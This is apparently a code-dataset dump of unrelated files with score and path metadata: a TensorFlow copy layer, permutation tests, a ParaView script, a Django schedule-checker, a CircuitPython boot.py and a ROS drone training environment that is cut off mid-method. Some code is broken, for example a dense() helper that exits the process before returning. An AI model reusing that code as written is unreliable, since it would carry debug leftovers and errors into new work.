FLAGS = tf.app.flags.FLAGS
class CopyLayer(base.Layer):
"""Densely-connected layer class.
This layer implements the operation:
`outputs = activation(inputs * kernel + bias)`
Where `activation` is the activation function passed as the `activation`
argument (if not `None`), `kernel` is a weights matrix created by the layer,
and `bias` is a bias vector created by the layer
(only if `use_bias` is `True`).
Note: if the input to the layer has a rank greater than 2, then it is
flattened prior to the initial matrix multiply by `kernel`.
Arguments:
units: Integer or Long, dimensionality of the output space.
activation: Activation function (callable). Set it to None to maintain a
linear activation.
use_bias: Boolean, whether the layer uses a bias.
kernel_initializer: Initializer function for the weight matrix.
If `None` (default), weights are initialized using the default
initializer used by `tf.get_variable`.
bias_initializer: Initializer function for the bias.
kernel_regularizer: Regularizer function for the weight matrix.
bias_regularizer: Regularizer function for the bias.
activity_regularizer: Regularizer function for the output.
kernel_constraint: An optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
bias_constraint: An optional projection function to be applied to the
bias after being updated by an `Optimizer`.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: String, the name of the layer. Layers with the same name will
share weights, but to avoid mistakes we require reuse=True in such cases.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Properties:
units: Python integer, dimensionality of the output space.
activation: Activation function (callable).
use_bias: Boolean, whether the layer uses a bias.
kernel_initializer: Initializer instance (or name) for the kernel matrix.
bias_initializer: Initializer instance (or name) for the bias.
kernel_regularizer: Regularizer instance for the kernel matrix (callable)
bias_regularizer: Regularizer instance for the bias (callable).
activity_regularizer: Regularizer instance for the output (callable)
kernel_constraint: Constraint function for the kernel matrix.
bias_constraint: Constraint function for the bias.
kernel: Weight matrix (TensorFlow variable or tensor).
bias: Bias vector, if applicable (TensorFlow variable or tensor).
"""
def __init__(self, embedding_dim,
units,
switch_units=64,
activation=None,
use_bias=False,
kernel_initializer=None,
bias_initializer=init_ops.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None,
source_provider: Callable[[], tf.Tensor] = None,
source_provider_sl: Callable[[], tf.Tensor] = None,
condition_encoding: Callable[[], tf.Tensor] = None,
output_mask: Callable[[], tf.Tensor] = None,
training_mode=False,
vocab_size=None,
context_as_set=False,
max_copy_size=None,
mask_oovs=False,
**kwargs):
super(CopyLayer, self).__init__(trainable=trainable, name=name,
activity_regularizer=activity_regularizer,
**kwargs)
self.vocab_size = vocab_size
self.source_provider = source_provider
self.source_provider_sl = source_provider_sl
self.embedding_dim = embedding_dim
self.units = units
self.switch_units = switch_units
self.activation = activation
self.use_bias = use_bias
self.kernel_initializer = kernel_initializer
self.bias_initializer = bias_initializer
self.kernel_regularizer = kernel_regularizer
self.bias_regularizer = bias_regularizer
self.kernel_constraint = kernel_constraint
self.bias_constraint = bias_constraint
self.input_spec = base.InputSpec(min_ndim=2)
self.training_mode=training_mode
# self.output_mask=output_mask
self.max_copy_size=max_copy_size
self.mask_oovs = mask_oovs
self.context_as_set=context_as_set
self.condition_encoding = condition_encoding
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
# print("building copy layer")
# print(input_shape)
self.built = True
def call(self, inputs):
inputs = ops.convert_to_tensor(inputs, dtype=self.dtype) # batch x len_source+emb_dim
# inputs = debug_shape(inputs, "inputs")
# print(inputs)
# [batch_size, emb_dim + len_source] in eval,
# [len_target, batch_size,emb_dim + len_source] in train
source = self.source_provider() # [batch_size, len_source]
# source = debug_shape(source,"src")
source_sl = self.source_provider_sl()
condition_encoding = self.condition_encoding()
# condition_encoding = debug_shape(condition_encoding, "cond enc")
batch_size = tf.shape(source)[0]
len_source = tf.shape(source)[1]
shape = tf.shape(inputs)
is_eval = len(inputs.get_shape()) == 2
beam_width = tf.constant(1) if is_eval else shape[1]
# len_target = tf.Print(len_target, [len_target, batch_size, shape[-1]], "input reshape")
# inputs = tf.reshape(inputs, [-1, shape[-1]]) # [len_target * batch_size, len_source + emb_dim]
inputs_new = tf.reshape(inputs,
[batch_size*beam_width, shape[-1]]) # [len_target, batch_size, len_source + emb_dim]
# inputs_new = debug_shape(inputs_new, "inputs_new")
# -- [len_target, batch_size, embedding_dim] attention, []
# -- [len_target, batch_size, len_source] alignments
# attention, alignments = tf.split(inputs, [self.embedding_dim, -1], axis=1)
attention, alignments = tf.split(inputs_new, num_or_size_splits=[self.embedding_dim, -1], axis=-1)
# [len_target, batch_size, vocab_size]
if FLAGS.out_vocab_cpu:
with tf.device('/cpu:*'):
shortlist = tf.layers.dense(attention, self.vocab_size, activation=tf.nn.softmax, use_bias=False)
else:
shortlist = tf.layers.dense(attention, self.vocab_size, activation=tf.nn.softmax, use_bias=False)
# attention = debug_shape(attention, "attn")
# alignments = debug_shape(alignments, "align ("+str(self.units)+" desired)")
# alignments = debug_tensor(alignments, "alignments")
# print(alignments)
# shortlist = debug_shape(shortlist, "shortlist")
# TEMP: kill OOVs
s = tf.shape(shortlist)
mask = tf.concat([tf.ones((s[0],1)),tf.zeros((s[0],1)),tf.ones((s[0],s[1]-2))], axis=1)
shortlist = tf.cond(self.mask_oovs, lambda: shortlist * mask, lambda: shortlist)
# pad the alignments to the longest possible source st output vocab is fixed size
# TODO: Check for non zero alignments outside the seq length
# alignments_padded = debug_shape(alignments_padded, "align padded")
# switch takes st, vt and yt−1 as inputs
# vt = concat(weighted context encoding at t; condition encoding)
# st = hidden state at t
# y_t-1 is previous generated token
condition_encoding_tiled = tf.contrib.seq2seq.tile_batch(condition_encoding, multiplier=beam_width)
vt = tf.concat([attention, condition_encoding_tiled], axis=1)
# NOTE: this is missing the previous input y_t-1 and s_t
switch_input = tf.concat([vt],axis=1)
switch_h1 = tf.layers.dropout(tf.layers.dense(switch_input, self.switch_units, activation=tf.nn.tanh, kernel_initializer=tf.glorot_uniform_initializer()), rate=0.3, training=self.training_mode)
switch_h2 = tf.layers.dropout(tf.layers.dense(switch_h1, self.switch_units, activation=tf.nn.tanh, kernel_initializer=tf.glorot_uniform_initializer()), rate=0.3, training=self.training_mode)
self.switch = tf.layers.dense(switch_h2, 1, activation=tf.sigmoid, kernel_initializer=tf.glorot_uniform_initializer())
# switch = debug_shape(switch, "switch")
if FLAGS.disable_copy:
self.switch = 0
elif FLAGS.disable_shortlist:
self.switch = 1
# if self.output_mask is not None:
# alignments = self.output_mask() * alignments
source_tiled = tf.contrib.seq2seq.tile_batch(source, multiplier=beam_width)
source_tiled_sl = tf.contrib.seq2seq.tile_batch(source_sl, multiplier=beam_width)
shortlist = (1-self.switch)*shortlist
alignments = self.switch*alignments
# Take any tokens that are the same in either vocab and combine their probabilities
# old: mult by a big sparse matrix - not v mem efficient..
# opt1: mult the copy dist by a vocab x copy matrix and add to vocab part
# opt2: do an nd_gather to copy the relevant prob mass, then mask carefully to remove it
if FLAGS.combine_vocab:
# copy everything in real shortlist except special toks
# print(len_source, self.max_copy_size)
source_tiled_sl_padded = tf.pad(source_tiled_sl, [[0, 0], [0, self.max_copy_size-tf.shape(source_tiled_sl)[-1]]], 'CONSTANT', constant_values=0)
# attempt 2!
batch_ix = tf.tile(tf.expand_dims(tf.range(batch_size*beam_width),axis=-1),[1,len_source])
# seq_ix = tf.tile(tf.expand_dims(tf.range(len_source),axis=0),[batch_size*beam_width,1])
tgt_indices = tf.reshape(tf.concat([tf.expand_dims(batch_ix,-1),tf.expand_dims(source_tiled_sl,-1)], axis=2),[-1,2])
ident_indices = tf.where(tf.greater(source_tiled_sl, -1)) # get ixs of all elements
# ident_indices = tf.where()
# tgt_indices = debug_tensor(tgt_indices)
# get the copy probs at each point in the source..
updates = tf.reshape(tf.gather_nd(alignments, ident_indices),[-1])
# and send them to the their shortlist index
sum_part = tf.scatter_nd(tgt_indices, updates, [batch_size*beam_width, self.vocab_size+self.max_copy_size])
# then zero out the ix's that got copied
align_zeroed = alignments * tf.cast(tf.greater_equal(source_tiled_sl,self.vocab_size),tf.float32)
align_moved = alignments * tf.cast(tf.less(source_tiled_sl,self.vocab_size),tf.float32) # ie only let through stuff that *isnt* in SL
# and add the correct pieces together
alignments = align_zeroed
shortlist = shortlist + sum_part[:,:self.vocab_size]
# result = tf.Print(result, [tf.reduce_sum(result[:,:self.vocab_size],-1)], "result sl sum")
# shortlist = tf.Print(shortlist, [tf.reduce_sum(align_moved,-1)], "sum align_moved")
# shortlist = tf.Print(shortlist, [tf.reduce_sum(sum_part[:,:self.vocab_size],-1)], "sum sum_part")
# convert position probs to ids
if self.context_as_set:
# print(source) # batch x seq
# print(alignments) # batch x seq
pos_to_id = tf.one_hot(source_tiled-self.vocab_size, depth=self.max_copy_size) # batch x seq x vocab
if FLAGS.maxout_pointer:
copy_dist = tf.reduce_max(pos_to_id * tf.expand_dims(alignments, 2), axis=1)
else:
copy_dist = tf.squeeze(tf.matmul(tf.expand_dims(alignments,1), pos_to_id), axis=1)
else:
copy_dist=alignments
copy_dist_padded = tf.pad(copy_dist, [[0, 0], [0, self.max_copy_size-tf.shape(copy_dist)[-1]]], 'CONSTANT', constant_values=0)
result = tf.concat([shortlist,copy_dist_padded], axis=1) # this used to be safe_log'd
# if FLAGS.combine_vocab:
# result = tf.Print(result, [tf.reduce_sum(result,-1)], "result sum")
target_shape = tf.concat([shape[:-1], [-1]], 0)
result =tf.reshape(result, target_shape)
return result
# return tf.Print(result, [tf.reduce_max(switch), tf.reduce_max(shortlist),
# tf.reduce_max(alignments)], summarize=10)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
input_shape = input_shape.with_rank_at_least(2)
# print(input_shape)
if input_shape[-1].value is None:
raise ValueError(
'The innermost dimension of input_shape must be defined, but saw: %s'
% input_shape)
return input_shape[:-1].concatenate(self.units+self.vocab_size if not self.context_as_set else self.vocab_size+self.max_copy_size)
# this for older tf versions
def _compute_output_shape(self, input_shape):
return self.compute_output_shape(input_shape)
def dense(
inputs, units,
activation=None,
use_bias=True,
kernel_initializer=None,
bias_initializer=init_ops.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None,
reuse=None):
"""Functional interface for the densely-connected layer.
This layer implements the operation:
`outputs = activation(inputs.kernel + bias)`
Where `activation` is the activation function passed as the `activation`
argument (if not `None`), `kernel` is a weights matrix created by the layer,
and `bias` is a bias vector created by the layer
(only if `use_bias` is `True`).
Note: if the `inputs` tensor has a rank greater than 2, then it is
flattened prior to the initial matrix multiply by `kernel`.
Arguments:
inputs: Tensor input.
units: Integer or Long, dimensionality of the output space.
activation: Activation function (callable). Set it to None to maintain a
linear activation.
use_bias: Boolean, whether the layer uses a bias.
kernel_initializer: Initializer function for the weight matrix.
If `None` (default), weights are initialized using the default
initializer used by `tf.get_variable`.
bias_initializer: Initializer function for the bias.
kernel_regularizer: Regularizer function for the weight matrix.
bias_regularizer: Regularizer function for the bias.
activity_regularizer: Regularizer function for the output.
kernel_constraint: An optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
bias_constraint: An optional projection function to be applied to the
bias after being updated by an `Optimizer`.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: String, the name of the layer.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
Output tensor.
Raises:
ValueError: if eager execution is enabled.
"""
layer = CopyLayer(units,
activation=activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name=name,
dtype=inputs.dtype.base_dtype,
_scope=name,
_reuse=reuse)
print("inside copy layer, yaaay!")
sys.exit(0)
return layer.apply(inputs)
| 2.265625
| 2
|
tests/math/perm_test.py
|
muhrin/e3nn
| 1
|
12783528
|
import math
import pytest
from e3nn.math import perm
@pytest.mark.parametrize('n', [0, 1, 2, 3, 4, 5])
def test_inverse(n):
for p in perm.group(n):
ip = perm.inverse(p)
assert perm.compose(p, ip) == perm.identity(n)
assert perm.compose(ip, p) == perm.identity(n)
@pytest.mark.parametrize('n', [0, 1, 2, 3, 4, 5])
def test_int_inverse(n):
for j in range(math.factorial(n)):
p = perm.from_int(j, n)
i = perm.to_int(p)
assert i == j
@pytest.mark.parametrize('n', [0, 1, 2, 3, 4, 5])
def test_int_injection(n):
group = {perm.from_int(j, n) for j in range(math.factorial(n))}
assert len(group) == math.factorial(n)
def test_germinate():
assert perm.is_group(perm.germinate({(1, 2, 3, 4, 0)}))
assert perm.is_group(perm.germinate({(1, 0, 2, 3), (0, 2, 1, 3), (0, 1, 3, 2)}))
@pytest.mark.parametrize('n', [0, 1, 2, 3, 4, 5])
def test_rand(n):
perm.is_perm(perm.rand(n))
def test_not_group():
assert not perm.is_group(set()) # empty
assert not perm.is_group({(1, 0, 2), (0, 2, 1), (1, 2, 0), (2, 0, 1), (2, 1, 0)}) # missing neutral
assert not perm.is_group({(0, 1, 2), (1, 2, 0)}) # missing inverse
| 2.625
| 3
|
north-greenland/Elmer/4a_DIAGNOSTIC/PlotScript.py
|
ElmerCSC/ElmerIceCourses
| 0
|
12783529
|
<gh_stars>0
from paraview.simple import *
import sys
sys.path.append('../../Codes/PostProcessing')
from ToStreamLine import *
from PlotGroundingLine import *
"""
Simple script to show how to use pvpython to automatise
post processing
"""
StreamLine="../../Data/StreamLine/StreamLine.csv"
SaveFile="ResOnStreamLine.csv"
vtuFile='MESH_1/RUN1__t0001.vtu'
# read vtu file
vtu = XMLUnstructuredGridReader(FileName=vtuFile)
# Show results
renderView1 = GetActiveViewOrCreate('RenderView')
renderView1.ViewSize = [600, 600]
Display = Show(vtu, renderView1)
# set scalar coloring
ColorBy(Display, ('POINTS', 'ssavelocity', 'Magnitude'))
ssavelocityLUT = GetColorTransferFunction('ssavelocity')
ssavelocityLUT.MapControlPointsToLogSpace()
ssavelocityLUT.UseLogScale = 1
ssavelocityLUT.RescaleTransferFunction(1.0, 2000.0)
## plot Grounding line edges
SetActiveSource(vtu)
GLEdges()
## plot Grounding line from flotation
SetActiveSource(vtu)
GLFlot()
## resample stream Line
SetActiveSource(vtu)
Resample(StreamLine)
## save resampled
SaveResampled(SaveFile)
## Save screenshot
# current camera placement for renderView1
renderView1.InteractionMode = '2D'
renderView1.CameraPosition = [-249524.47156507644, -1022008.0234601084, 10000.0]
renderView1.CameraFocalPoint = [-249524.47156507644, -1022008.0234601084, 0.0]
renderView1.CameraParallelScale = 226895.9823084111
SaveScreenshot('map.png')
## make pv 2D plots
FlowLinePlot()
## save screenshot
layout = GetLayoutByName("FlowLine Layout")
SaveScreenshot('Stream.png', layout, SaveAllViews=1)
| 2.21875
| 2
|
2017/day_01/day_01.py
|
viddrobnic/adventofcode
| 0
|
12783530
|
l = list(map(int, input()))
s_1, s_2 = 0, 0
for i in range(len(l)):
s_1 += l[i] if l[i] == l[(i + 1) % len(l)] else 0
s_2 += l[i] if l[i] == l[(i + len(l) // 2) % len(l)] else 0
print('Part One: {}\nPart Two: {}'.format(s_1, s_2))
| 3.3125
| 3
|
server/processes/services/schedule_checker.py
|
CloudReactor/task_manager
| 0
|
12783531
|
from typing import Generic, Optional, TypeVar
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
import logging
from crontab import CronTab
from dateutil.relativedelta import *
from django.db import transaction
from django.utils import timezone
from processes.common.request_helpers import context_with_request
from processes.models import (
Alert, AlertSendStatus, AlertMethod, MissingScheduledExecution,
Schedulable
)
MIN_DELAY_BETWEEN_EXPECTED_AND_ACTUAL_SECONDS = 300
MAX_EARLY_STARTUP_SECONDS = 60
MAX_STARTUP_SECONDS = 10 * 60
MAX_SCHEDULED_LATENESS_SECONDS = 30 * 60
logger = logging.getLogger(__name__)
BoundSchedulable = TypeVar('BoundSchedulable', bound=Schedulable)
class ScheduleChecker(Generic[BoundSchedulable], metaclass=ABCMeta):
def check_all(self) -> None:
model_name = self.model_name()
for schedulable in self.manager().filter(enabled=True).exclude(schedule='').all():
logger.info(f"Found {model_name} {schedulable} with schedule {schedulable.schedule}")
try:
self.check_execution_on_time(schedulable)
except Exception:
logger.exception(f"check_all() failed on {model_name} {schedulable.uuid}")
def check_execution_on_time(self, schedulable: BoundSchedulable) \
-> Optional[MissingScheduledExecution]:
model_name = self.model_name()
schedule = schedulable.schedule.strip()
if not schedule:
logger.warning(f"For schedulable entity {schedulable.uuid}, schedule '{schedule}' is blank, skipping")
return None
mse: Optional[MissingScheduledExecution] = None
m = Schedulable.CRON_REGEX.match(schedule)
if m:
cron_expr = m.group(1)
logger.info(
f"check_execution_on_time(): {model_name} {schedulable.name} with schedule {schedulable.schedule} has cron expression '{cron_expr}'")
try:
entry = CronTab(cron_expr)
except Exception as ex:
logger.exception(f"Can't parse cron expression '{cron_expr}'")
raise ex
utc_now = timezone.now()
negative_previous_execution_seconds_ago = entry.previous(
default_utc=True)
if negative_previous_execution_seconds_ago is None:
logger.info('check_execution_on_time(): No expected previous execution, returning')
return None
previous_execution_seconds_ago = -(negative_previous_execution_seconds_ago or 0.0)
if previous_execution_seconds_ago < MIN_DELAY_BETWEEN_EXPECTED_AND_ACTUAL_SECONDS:
logger.info('check_execution_on_time(): Expected previous execution too recent, returning')
return None
expected_datetime = (utc_now - timedelta(seconds=previous_execution_seconds_ago) + timedelta(
microseconds=500000)).replace(microsecond=0)
if expected_datetime < schedulable.schedule_updated_at:
logger.info(
f"check_execution_on_time(): Previous execution expected to start at at {expected_datetime} but that is before the schedule was last updated at {schedulable.schedule_updated_at}")
return None
logger.info(
f"check_execution_on_time(): Previous execution was supposed to start {previous_execution_seconds_ago / 60} minutes ago at {expected_datetime}")
with transaction.atomic():
mse = self.check_executed_at(schedulable, expected_datetime)
else:
m = Schedulable.RATE_REGEX.match(schedule)
if m:
n = int(m.group(1))
time_unit = m.group(2).lower().rstrip('s')
logger.info(
f"{model_name} {schedulable.name} with schedule {schedulable.schedule} has rate {n} per {time_unit}")
relative_delta = self.make_relative_delta(n, time_unit)
utc_now = timezone.now()
expected_datetime = utc_now - relative_delta
if expected_datetime < schedulable.schedule_updated_at:
logger.info(
f"check_execution_on_time(): Previous execution expected after {expected_datetime} but that is before the schedule was last updated at {schedulable.schedule_updated_at}")
return None
logger.info(
f"check_execution_on_time(): Previous execution was supposed to start executed after {expected_datetime}")
with transaction.atomic():
mse = self.check_executed_after(schedulable,
expected_datetime, relative_delta, utc_now)
else:
raise Exception(f"Schedule '{schedule}' is not a cron or rate expression")
if mse:
self.send_alerts(mse)
return mse
def check_executed_at(self, schedulable: BoundSchedulable,
expected_datetime: datetime) -> Optional[MissingScheduledExecution]:
model_name = self.model_name()
mse = self.missing_scheduled_executions_of(schedulable).filter(
expected_execution_at=expected_datetime).first()
if mse:
logger.info(
f"check_executed_at(): Found existing matching missing scheduled execution {mse.uuid}, not alerting")
return None
logger.info('check_executed_at(): No existing matching missing scheduled execution found')
pe = self.executions_of(schedulable).filter(
started_at__gte=expected_datetime - timedelta(seconds=MAX_EARLY_STARTUP_SECONDS),
started_at__lte=expected_datetime + timedelta(seconds=MAX_STARTUP_SECONDS)).first()
if pe:
logger.info(
f"check_execution_on_time(): Found execution of {model_name} {schedulable.uuid} within the expected time window")
return None
logger.info(
f"check_executed_at(): No execution of {model_name} {schedulable.uuid} found within the expected time window")
if schedulable.max_concurrency and \
(schedulable.max_concurrency > 0):
concurrency = schedulable.concurrency_at(expected_datetime)
if concurrency >= schedulable.max_concurrency:
logger.info(
f"check_executed_at(): {concurrency} concurrent executions of execution of {model_name} {schedulable.uuid} during the expected execution time prevented execution")
return None
mse = self.make_missing_scheduled_execution(schedulable, expected_datetime)
mse.save()
return mse
def check_executed_after(self, schedulable: BoundSchedulable,
expected_datetime: datetime, relative_delta: relativedelta,
utc_now: datetime):
model_name = self.model_name()
mse = self.missing_scheduled_executions_of(schedulable).order_by('-expected_execution_at').first()
if mse:
next_expected_execution_at = mse.expected_execution_at + relative_delta
if next_expected_execution_at >= expected_datetime:
logger.info(
f"check_executed_after(): Found existing missing scheduled execution {mse.uuid} expected at {mse.expected_execution_at}, next expected at {next_expected_execution_at}, not alerting")
return None
else:
logger.info(
f"check_executed_after(): No existing missing scheduled execution instances for {model_name} {schedulable.uuid}")
pe = self.executions_of(schedulable).filter(
started_at__gte=expected_datetime - timedelta(seconds=MAX_EARLY_STARTUP_SECONDS),
started_at__lte=utc_now).first()
if pe:
logger.info(
f"check_executed_after(): Found execution of {model_name} {schedulable.uuid} after the expected time")
return None
logger.info(
f"check_executed_after(): No execution of {model_name} {schedulable.uuid} found after expected time")
if schedulable.max_concurrency and \
(schedulable.max_concurrency > 0):
concurrency = schedulable.concurrency_at(expected_datetime)
if concurrency >= schedulable.max_concurrency:
logger.info(
f"check_executed_after(): {concurrency} concurrent executions of execution of {model_name} {schedulable.uuid} during the expected execution time prevent execution")
return None
mse = self.make_missing_scheduled_execution(schedulable, expected_datetime)
mse.save()
return mse
@staticmethod
def make_relative_delta(n: int, time_unit: str) -> relativedelta:
if time_unit == 'second':
return relativedelta(seconds=n)
if time_unit == 'minute':
return relativedelta(minutes=n)
if time_unit == 'hour':
return relativedelta(hours=n)
if time_unit == 'day':
return relativedelta(days=n)
if time_unit == 'month':
return relativedelta(months=n)
if time_unit == 'year':
return relativedelta(years=n)
raise Exception(f"Unknown time unit '{time_unit}'")
def send_alerts(self, mse) -> None:
details = self.missing_scheduled_execution_to_details(mse, context_with_request())
for am in mse.schedulable_instance.alert_methods.filter(
enabled=True).exclude(error_severity_on_missing_execution='').all():
severity = am.error_severity_on_missing_execution
mspea = self.make_missing_execution_alert(mse, am)
mspea.save()
epoch_minutes = divmod(mse.expected_execution_at.timestamp(), 60)[0]
grouping_key = f"missing_scheduled_{self.model_name().replace(' ', '_')}-{mse.schedulable_instance.uuid}-{epoch_minutes}"
try:
result = am.send(details=details, severity=severity,
summary_template=self.alert_summary_template(),
grouping_key=grouping_key)
mspea.send_result = result
mspea.send_status = AlertSendStatus.SUCCEEDED
mspea.completed_at = timezone.now()
except Exception as ex:
logger.exception(f"Failed to send alert for missing execution of {mse.schedulable_instance.uuid}")
mspea.send_status = AlertSendStatus.FAILED
mspea.error_message = str(ex)[:Alert.MAX_ERROR_MESSAGE_LENGTH]
mspea.save()
@abstractmethod
def model_name(self) -> str:
pass
@abstractmethod
def manager(self):
pass
@abstractmethod
def missing_scheduled_executions_of(self, schedulable: BoundSchedulable):
pass
@abstractmethod
def executions_of(self, schedulable: BoundSchedulable):
pass
@abstractmethod
def make_missing_scheduled_execution(self, schedulable: BoundSchedulable,
expected_execution_at: datetime) -> MissingScheduledExecution:
pass
@abstractmethod
def missing_scheduled_execution_to_details(self,
mse: MissingScheduledExecution, context) -> dict:
pass
@abstractmethod
def make_missing_execution_alert(self, mse: MissingScheduledExecution,
alert_method: AlertMethod) -> Alert:
pass
@abstractmethod
def alert_summary_template(self) -> str:
pass
| 2.203125
| 2
|
e1.5/boot.py
|
vwallen/hcde539-a2020
| 0
|
12783532
|
<gh_stars>0
import board
import digitalio
import storage
import os
# Make the file system writable
# Via: https://learn.adafruit.com/circuitpython-essentials/circuitpython-storage
# If the switch pin is connected to ground CircuitPython can write to the drive
# Also used this to re-enable writing after a bad boot.py edit:
# https://learn.adafruit.com/cpu-temperature-logging-with-circuit-python/writing-to-the-filesystem
switch = digitalio.DigitalInOut(board.D7)
switch.direction = digitalio.Direction.INPUT
switch.pull = digitalio.Pull.UP
# This allows both the host system and python to write to the file system
# This is "dangerous" for unspecified reasons, so let's jump the canyon
storage.remount("/", readonly=False, disable_concurrent_write_protection=True)
| 3.15625
| 3
|
script/env_sds_ddpg_cont.py
|
cyberphantom/Selfie-Drone-Stick
| 2
|
12783533
|
<filename>script/env_sds_ddpg_cont.py
#!/usr/bin/env python
import time
import numpy as np
import pandas
import rospy
import tf
import cv2, os
from cv_bridge import CvBridge, CvBridgeError
from geometry_msgs.msg import Twist, Vector3Stamped, Pose, PoseWithCovarianceStamped
from sensor_msgs.msg import CompressedImage, Image
from gazebo_msgs.srv import SetModelState
from gazebo_msgs.msg import ModelState
from hector_uav_msgs.msg import Altimeter
from sensor_msgs.msg import Imu
from std_msgs.msg import Empty
from std_msgs.msg import String
import gym
from gym import utils, spaces
from gym.utils import seeding
from gym.envs.registration import register
from lib.gazebo_connection import GazeboConnection
from face_human_detection_tracking_agent.dunet.droset_person_od import person_detector
from lib.helper import *
from lib.sds_cmd import cmdVel
import math
reg = register(
id='sds_ddpg_cont-v0',
entry_point='env_sds_ddpg_cont:envi',
# timestep_limit=100,
)
class envi(gym.Env):
def __init__(self):
# Gazebo
self.g_set_state = rospy.ServiceProxy("/gazebo/set_model_state", SetModelState)
# Publishing Nodes must be initialized before the environment
self.takeoff_pub = rospy.Publisher('/drone/takeoff', Empty, queue_size=0)
self.vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=5)
self.obs_pos = rospy.Publisher('/obs/pos', Pose, queue_size=5, latch=True)
self.pos_pub = rospy.Publisher("/initialpose", PoseWithCovarianceStamped, latch=True)
# comment in training
self.sds_pub = rospy.Publisher("/sds/image_raw", Image, queue_size=10)
# Get env. parameters from th yaml file
self.max_alt = rospy.get_param("/alt_TH/max")
self.min_alt = rospy.get_param("/alt_TH/min")
self.yawMin = rospy.get_param("/yaw_TH/min")
self.yawMax = rospy.get_param("/yaw_TH/max")
self.ratioMin = rospy.get_param("/ratio_TH/min")
self.ratioMax = rospy.get_param("/ratio_TH/max")
self.f_W = rospy.get_param("/input_frame_size/w")
self.f_H = rospy.get_param("/input_frame_size/h")
self.step_dur = rospy.get_param("/step_duration")
self.fail_sec_detect_TH = rospy.get_param("/failed_sec_detect_TH")
self.steps_TH = rospy.get_param("/stepsTH")
self.nactions = rospy.get_param("/nactions")
#self.initPose.orientation.w = rospy.get_param('/init_state/ow')
self.initPose = Pose()
# Desired position based on the target that specified by the phone
self.g_yaw = None
self.g_cx = None
self.g_cy = None
self.g_ratio = None
# Carfully discritize the drone world
self.div_yaw = ((abs(self.yawMax) + abs(self.yawMin))/ 0.39)
self.div_w = ((self.f_W+80) / 80)
self.div_h = ((self.f_H+60) / 60)
self.div_ratio = (self.ratioMax + self.ratioMin)/ 0.04
# Descretize the states (observations)
# The no. of state is so huge so in order to simplify the situation, we discretize
# the space to: [13, 17, 13, 9] bins
self.yaw_bins = pandas.cut([self.yawMin, self.yawMax], bins=self.div_yaw, retbins=True)[1] # 8 bins
self.cx_bins = pandas.cut([-40, 680], bins=self.div_w, retbins=True)[1][1:-1] # 8 bins
self.cy_bins = pandas.cut([-30, 390], bins=self.div_h, retbins=True)[1][1:-1] # 6 bins
self.ratio_bins = pandas.cut([self.ratioMin, self.ratioMax], bins=self.div_ratio, retbins=True)[1] # 7 bins
# In __init__ we establish a connection to gazebo
self.gazebo = GazeboConnection()
self.bridge = CvBridge()
self.dunet = person_detector()
self.action_space = spaces.Discrete(self.nactions)
#self._seed()
self.rate = rospy.Rate(10) # 10Hz = 1/10 = 0.1 sec or 10 times/s
self.drone_status = None
# Reset observation and reward variables
self.failure_detect_Count = 0
self.reset_bined_obs = []
self.stepCount = 0
self.reward = 0
self.drone_shot = 0
self.drone_shot_count = 0
self.done = False
self.end = False
self.bbx, self.imu, self.drone_yaw = [], None, None
self.img, self.box_ratio, self.box_centroid = None, None, None
self.bined_obs, self.prev_bined_obs, self.distXY, self.prev_distXY = [], [], None, None
self.x1, self.x2, self.y1, self.y2 = None, None, None, None
def _reset(self):
# Reset observation and reward variables
self.box_ratio, self.box_centroid = None, None
self.reset_bined_obs = []
self.failure_detect_Count = 0
self.stepCount = 0
self.drone_shot_count = 0
self.reward = 0
self.done = False
self.end = False
#tar_pos = [[5, 6, 4, 2], [4, 4, 4, 2], [3, 2, 4, 3]]
tar_pos = [[5, 6, 4, 2], [3, 2, 4, 3]]
target = random.randint(0, 1) # Don't forget to change here
self.bined_goal = tar_pos[target]
# Reset every step too!
self.bbx, self.drone_yaw = [], None
self.box_ratio, self.box_centroid = None, None
self.bined_obs, self.prev_bined_obs, self.distXY, self.prev_dist = [], [], None, None
self.x1, self.x2, self.y1, self.y2 = None, None, None, None
# Corrected: Takeff only happens once
if self.drone_status is None:
while (self.takeoff_pub.get_num_connections() != 0):
try:
self.takeoff_sequence()
self.drone_status = "tookoff"
rospy.loginfo("Taking off completed")
break
except:
rospy.loginfo("No subscribers to Takeoff yet, so we wait and try again")
else:
self.reset_pos()
self.send_up_cmd()
while len(self.reset_bined_obs) == 0:
try:
self.reset_bined_obs = self.observe()
self.reset_bined_obs = self.observe()
except:
rospy.loginfo("Getting observation again!")
return self.reset_bined_obs+self.bined_goal
def _step(self, action):
self.stepCount += 1
self.reward = 0.0
# Reset every step
self.bbx, self.imu, self.drone_yaw = [], None, None
self.img, self.box_ratio, self.box_centroid = None, None, None
obs_count = 0
cmd_vel = cmdVel(action, self.drone_speed)
self.prev_bined_obs = self.bined_obs
self.vel_pub.publish(cmd_vel)
self.vel_pub.publish(cmd_vel)
time.sleep(0.2)
self.vel_pub.publish(cmdVel(0, 1))
self.vel_pub.publish(cmdVel(0, 1))
time.sleep(0.1)
#time.sleep(self.step_dur)
self.bined_obs = []
